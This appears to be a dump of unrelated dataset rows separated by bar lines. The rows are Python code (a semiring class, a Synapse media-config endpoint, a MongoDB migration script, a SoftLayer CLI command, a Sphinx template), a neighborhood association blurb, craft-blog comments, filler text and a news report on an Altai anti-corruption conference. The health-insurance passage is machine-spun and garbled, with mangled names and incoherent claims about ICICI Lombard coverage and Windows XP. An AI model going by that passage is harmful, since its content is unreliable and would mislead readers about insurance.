# -*- coding: utf-8 -*-
# Copyright (c) 2012 - Seweryn Dynerowicz, FUNDP.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# imitations under the License.
class Semiring:
zeroElt = None
unitElt = None
def __init__(self, val):
self.elt = val
def __add__(self, other):
raise NotImplementedError("Additive law not implemented.")
def __mul__(self, other):
raise NotImplementedError("Multiplicative law not implemented.")
def __le__(self, other): # <=
raise NotImplementedError("Canonical preorder relation not specified.")
def __lt__(self, other): # <
return (self <= other and self != other)
def __ge__(self, other):
return (other <= self)
def __gt__(self, other):
return (other < self)
def __eq__(self, other):
return (self.elt == other.elt)
def __ne__(self, other):
return (not self.elt == other.elt)
# Representation related stuff
def __repr__(self):
raise NotImplementedError("Representation not specified.")
# Power operator (not square-and-multiply)
def __pow__(self, p):
rPow = p
res = self.unit()
while(rPow > 0):
res = res * self
rPow -= 1
return res
def isZero(self):
return self.elt == self.zeroElt
def isUnit(self):
return self.elt == self.unitElt
@classmethod
def zero(cls):
return cls(cls.zeroElt)
@classmethod
def unit(cls):
return cls(cls.unitElt)
|
Glen Meadow Neighborhood Association (GMNA) membership is voluntary — and IMPORTANT. Through your support, both financial & physical, your Neighborhood Association is able to accomplish great things for the neighborhood.
VIPs (Volunteers In Patrol): Year-round neighborhood patrol, ensuring personal safety & property protection.
Crime Watch: Monitors criminal activity & alerts us of trends so we can take precautions.
Beautification: Awards “Yard of the Month” and provides year-round maintenance of Glen Meadow Park grounds, gazebo, & equipment.
Social: Plans & hosts Events that help us get acquainted with our neighbors while we have fun.
|
# Copyright 2018 Will Hunt <will@half-shot.uk>
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING
from twisted.web.server import Request
from synapse.http.server import DirectServeJsonResource, respond_with_json
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class MediaConfigResource(DirectServeJsonResource):
isLeaf = True
def __init__(self, hs: "HomeServer"):
super().__init__()
config = hs.config
self.clock = hs.get_clock()
self.auth = hs.get_auth()
self.limits_dict = {"m.upload.size": config.max_upload_size}
async def _async_render_GET(self, request: SynapseRequest) -> None:
await self.auth.get_user_by_req(request)
respond_with_json(request, 200, self.limits_dict, send_cors=True)
async def _async_render_OPTIONS(self, request: Request) -> None:
respond_with_json(request, 200, {}, send_cors=True)
|
Today I am extremely happy to share with you that I am a part of Critter Sketch Blog Hop. This is my first blog hop and I am very much exited about it.
Winners of the Blog hop will win 3 prizes from our sponsors.
Cute card, I like what you did to the inside.
Wow what a georgous card. You did a wonderful job working with the sketch and image. Thank you for being a part of the 100th blog hop, it means a lot to me.
I love the metal sticker and the ribbon most. You did great job!
Very cute card. The image is so sweet and the paper is beautiful!!!
This is super cute! Love the image, the birds are really sweeties!
Very sweet card…wish I could make flowers like you do!
What a cute card! Love that you showed the inside as well as the out!
Sweet image and lovely color combo. Great job on the inside and out.
Beautiful card! Love the paper and that adorable image.
Happy 100th challenge at Critter Sketch Challenges!!!
|
#!/usr/bin/python
# depends:
# ^ pymongo # install via: easy_install pymongo
# behaviour:
# ^ the script will "move" the collections if source and target server are the same
# but will "copy" (dump/restore) if source and target servers are different
from_host = '127.0.0.1'
from_port = '27017'
from_db = '11'
from_auth_db = 'cgrates' # Auth db on source server
from_user = 'cgrates'
from_pass = ''
to_host = '127.0.0.1'
to_port = '27017'
to_db = '10'
to_auth_db = "cgrates" # Auth db on target server
to_user = 'cgrates'
to_pass = ''
ignore_empty_cols = True
# Do not migrate collections with 0 document count.
# Works only if from/to is on same host.
# Overwrite target collections flag.
# Works only if from/to is on same host.
# If from/to hosts are different we use mongorestore which overwrites by default.
drop_target = False
dump_folder = 'dump'
import sys
from pymongo import MongoClient
from urllib import quote_plus
from collections import OrderedDict
# same server
if from_host == to_host and from_port == to_port:
print('Migrating on same server...')
mongo_from_url = 'mongodb://' + from_user + ':' + quote_plus(from_pass) + '@'+ from_host + ':' + from_port + '/' + from_auth_db
if from_pass == '': # disabled auth
mongo_from_url = 'mongodb://' + from_host + ':' + from_port + '/' + from_db
client = MongoClient(mongo_from_url)
db = client[from_db]
cols = db.collection_names()
# collections found
if len(cols) > 0:
print('Found %d collections on source. Moving...' % len(cols))
i = 0
for col in cols:
i += 1
if not ignore_empty_cols or (ignore_empty_cols and db[col].count() > 0):
print('Moving collection %s (%d of %d)...' % (col, i, len(cols)))
try:
client.admin.command(OrderedDict([('renameCollection', from_db + '.' + col), ('to', to_db + '.' + col), ('dropTarget', drop_target)]))
except:
e = sys.exc_info()[0]
print(e)
else:
print('Skipping empty collection %s (%d of %d)...' % (col, i, len(cols)))
# no collections found
else:
print('No collections in source database.')
# different servers
else:
import subprocess
import os
import shutil
print('Migrating between different servers...')
print('Dumping...')
out = subprocess.check_output([
'mongodump',
'--host', '%s' % from_host,
'-u', '%s' % from_user,
'-p', '%s' % from_pass,
'--authenticationDatabase', '%s' % from_auth_db,
'--db', '%s' % from_db,
'--port', '%s' % from_port,
'-o', '%s' % dump_folder,
], stderr= subprocess.STDOUT)
print('Dump complete.')
print('Restoring...')
out = subprocess.check_output([
'mongorestore',
'--host', '%s' % to_host,
'-u', '%s' % to_user,
'-p', '%s' % to_pass,
'--authenticationDatabase', '%s' % to_auth_db,
'--db', '%s' % to_db,
'--port', '%s' % to_port,
'--drop', '%s/%s' % (dump_folder, from_db),
], stderr= subprocess.STDOUT)
print('Restore complete.')
print('Migration complete.')
|
this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp.
|
"""Order/create a dedicated Host."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
from SoftLayer.CLI import template
@click.command(
epilog="See 'slcli dedicatedhost create-options' for valid options.")
@click.option('--hostname', '-H',
help="Host portion of the FQDN",
required=True,
prompt=True)
@click.option('--router', '-r',
help="Router hostname ex. fcr02a.dal13",
show_default=True)
@click.option('--domain', '-D',
help="Domain portion of the FQDN",
required=True,
prompt=True)
@click.option('--datacenter', '-d', help="Datacenter shortname",
required=True,
prompt=True)
@click.option('--flavor', '-f', help="Dedicated Virtual Host flavor",
required=True,
prompt=True)
@click.option('--billing',
type=click.Choice(['hourly', 'monthly']),
default='hourly',
show_default=True,
help="Billing rate")
@click.option('--verify',
is_flag=True,
help="Verify dedicatedhost without creating it.")
@click.option('--template', '-t',
is_eager=True,
callback=template.TemplateCallback(list_args=['key']),
help="A template file that defaults the command-line options",
type=click.Path(exists=True, readable=True, resolve_path=True))
@click.option('--export',
type=click.Path(writable=True, resolve_path=True),
help="Exports options to a template file")
@environment.pass_env
def cli(env, **kwargs):
"""Order/create a dedicated host."""
mgr = SoftLayer.DedicatedHostManager(env.client)
order = {
'hostname': kwargs['hostname'],
'domain': kwargs['domain'],
'flavor': kwargs['flavor'],
'location': kwargs['datacenter'],
'hourly': kwargs.get('billing') == 'hourly',
}
if kwargs['router']:
order['router'] = kwargs['router']
do_create = not (kwargs['export'] or kwargs['verify'])
output = None
result = mgr.verify_order(**order)
table = formatting.Table(['Item', 'cost'])
table.align['Item'] = 'r'
table.align['cost'] = 'r'
if len(result['prices']) != 1:
raise exceptions.ArgumentError("More than 1 price was found or no "
"prices found")
price = result['prices']
if order['hourly']:
total = float(price[0].get('hourlyRecurringFee', 0.0))
else:
total = float(price[0].get('recurringFee', 0.0))
if order['hourly']:
table.add_row(['Total hourly cost', "%.2f" % total])
else:
table.add_row(['Total monthly cost', "%.2f" % total])
output = []
output.append(table)
output.append(formatting.FormattedItem(
'',
' -- ! Prices reflected here are retail and do not '
'take account level discounts and are not guaranteed.'))
if kwargs['export']:
export_file = kwargs.pop('export')
template.export_to_template(export_file, kwargs,
exclude=['wait', 'verify'])
env.fout('Successfully exported options to a template file.')
if do_create:
if not env.skip_confirmations and not formatting.confirm(
"This action will incur charges on your account. "
"Continue?"):
raise exceptions.CLIAbort('Aborting dedicated host order.')
result = mgr.place_order(**order)
table = formatting.KeyValueTable(['name', 'value'])
table.align['name'] = 'r'
table.align['value'] = 'l'
table.add_row(['id', result['orderId']])
table.add_row(['created', result['orderDate']])
output.append(table)
env.fout(output)
|
Rising middle-class incomes, inflationary stress on healthcare prices and the recognition of state-sponsored healthcare schemes will assist the health insurance coverage enterprise in India contact the Rs 35,000 crore mark by 2014-15, says the ‘India 2011 – Insurance coverage Trade Report’ launched by India Insure Threat Administration and Brokerage Providers. Don’t submit the claim documents at any native ICICI Lombard GIC Ltd. Along with coverage advantages of your coverage, you additionally get entry to a web based chat with a doctor, free health examine-ups and e-consultations to help you keep match and healthy. This allows you to avail well timed medical companies with out worrying concerning the funds, at any of our 4500+ community hospitals.
I’ll definitely be recommending ICICI Lombard personally to anyone on the lookout for well being insurance coverage. Study about the changing world of plans, premiums and advantages so you may make decisions that make sense for you and your loved ones. Add-on cowl for Outpatient Therapy, Wellness and Preventive Healthcare, and Maternity Profit.
There are laborious salary requirements to affix the personal insurance coverage as a result of it’s getting dearer superior in years. The waiting interval for maternity cowl is 3 years. Expenses arising from HIV or AIDS and associated illnesses, use or misuse of liquor, intoxicating substances or medication as well as intentional self-harm.
The advantages paid out for these conditions would create stress on premiums for all of the fund’s members, inflicting some to drop their membership, which would result in additional rises in premiums, and a vicious cycle of higher premiums-leaving members would ensue.
Nonetheless, these new features aren’t compatible with Home windows XP working Service Pack 1 or Service Pack 2. Secondly, since 2000, the government now provides health care to those who aren’t covered by a compulsory regime (those who have by no means worked and who are not students, meaning the very wealthy or the very poor).
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage', 'sphinx.ext.viewcode', ]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'{{ cookiecutter.project_name }}'
copyright = u'{{ cookiecutter.year }}, {{ cookiecutter.author }}'
version = u'{{ cookiecutter.version }}'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
On February 20, the opening of the 1st All-Russian Scientific and Practical Conference “The Role of Civil Society in Countering Corruption” took place at Altai State University.
The flagship university of Altai Krai held a scientific-practical conference on the social and sociological aspects of combating corruption for the first time. About 50 representatives of higher educational institutions and public organizations from various regions of the Russian Federation, as well as representatives of Altai Krai Government, who are in charge of this issue, have shown interest in this topic.
Conference participants noted that a significant role in the issue of combating corruption is played by educational and outreach activities, to which great attention should be paid in higher educational institutions. In particular, the sociologists of ASU study issues related to the social mechanisms for the formation of a civil society, the definition of institutional and non-institutional factors influencing the formation and counteraction of corruption.
The conference presented preliminary results of studies conducted by sociologists of ASU in the autumn of 2018, during which 1,200 people and 30 experts aged 18 to 70 years from 14 districts and 4 cities of Altai Krai were surveyed. Scientists were interested not only in the attitude of people towards corruption, but also in how they understand the corruption processes, their active or passive citizenship, etc.
“We conducted a study that assessed the role of various public associations in counteracting corruption: their attitude to this topic, work mechanisms and technologies of counteraction. At the same time, the attitude of the population to various kinds of situations in corruption was considered,” Head of the Department of Psychology of Communications and Psychotechnologies at the Faculty of Sociology of ASU, Professor, Doctor of Sociology Svetlana G. Maksimova said.
It is to be noted that the organizers of the All-Russian Conference included Altai State University, the Faculty of Sociology of Altai State University, Asian Expert and Analytical Center of Altai State University, the Resource Center for Development of Civil Initiatives and Promotion of Integration of Peoples and Cultures in Altai Krai, Altai Regional Public Organization of Psychological and Social Support and Health Care "Positive Development".
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.